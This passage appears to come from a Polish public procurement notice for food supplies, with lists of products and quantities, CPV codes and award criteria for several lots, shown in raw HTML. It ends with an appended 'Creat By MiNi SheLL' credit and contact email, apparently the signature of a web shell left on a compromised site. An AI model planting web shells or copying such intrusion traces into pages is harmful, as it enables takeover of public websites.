Płatki owsiane błyskawiczne op. 500g	
Szt	
40

PŁATKI KUKURYDZIANE, zawartość kukurydzy min. 98%, z substancjami wzbogacającymi m.in. witamina C, niacyna, żelazo zredukowane, wartość energetyczna w 100g produktu min. 370 kcal, opakowanie 500g typu nestle
	
Szt	
40

Płatki ryżowe błyskawiczne, op.500 g	
Szt	
20

Ptasie mleczko typu wedel a 420g	
Szt	
100

Proszek do pieczenia op. 30g typu delecta	 
Szt	
50

Przecier pomidorowy op. karton 500g, zawartość pomidorów 99%, bez konserwantów typu pudliszki lub typu łowicz	
Szt	
100

Przyprawa do kurczaka bez glutaminianu sodu i sztucznych barwników op.20g     typu kamis lub typu prymat	
Szt	
30

Przyprawa do pizzy op. 20g typu kamis	
Szt	
20

Przyprawa warzywna do potraw bez sztucznych dodatków, bez wzmacniaczy smaku, barwników - typu podravka-natur opak. 150g	
Szt	
140

Rodzynki sułtańskie op.100g lub 200g	
Kg
	
15

Rumianek herbata ekspresowa op. 20 szt	
Szt
	
15

Ryż biały długoziarnisty I klasa 	
Kg	
90

Sezamki op min. 27,2 g	
Szt 	
100


Soda oczyszczona op. 100g. 	
Szt 	
10

Soczewica czerwona op.max.1000g	
Kg
	
10

Sok owocowy 100% bez konserwantów, bez barwników, bez cukru, op.karton 0,2 l ze słomką	
Szt	
1000

Sok owocowy 100% bez konserwantów, bez barwników, bez cukru,op. karton 1 l	
Szt	
350

Sos do spaghetti z minimalną zawartością pomidorów 22% typu Łowicz, słoik  op. 500-520g	
Szt	
200


Sól kamienna op. 1000g	
Kg	
70

Szczaw konserwowy -op. słoik 350g	
Szt	
120

Tymianek op. 10g typu kamis lub typu prymat	
Szt
	
20

Wafel bez czekolady pojedynczo pak. min. 50 g typu grześki	
Szt
	
300


Woda niegazowana but.plastik 1,5 litr	
Szt	
250

Zacierki op. 250g	
Szt	
80

Ziele angielskie op. 10- 15g typu kamis lub typu prymat	
Szt	
50

Zioła prowansalskie op. 10-15 g typu kamis lub typu prymat	
Szt	
30

Żurek w butelkach 500 ml bez konserwantów	
Szt
	
30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryby: Mintaj mrożony extra I gatunek - filety mrożone pojedynczo, bez skóry, bez ości nie więcej niż 3% glazury technologicznej gat. I 	
Kg	
50

Dorsz mrożony extra I gatunek - filety mrożone pojedynczo, bez skóry, bez ości, nie więcej niż 3% glazury technologicznej gat. I	
Kg	
110

Makrela wędzona świeża, pakowana próżniowo w folię	
Kg	
40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja: 
Jaja ściółkowe L, świeże, klasa A, gat.I	
Szt	
5000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Woda niegazowana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda niegazowana: Woda źródlana, niegazowana, butle o pojemności ok. 19 litrów hermetycznie  zamykana	Szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Soki tłoczone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Soki tłoczone: NATURALNY SOK TŁOCZONY 100%, pasteryzowany, zawierający min. 1500g owoców na 1000ml soku, smaki: jabłko, jabłko-aronia, jabłko-gruszka, opakowanie karton 5000ml
	Szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com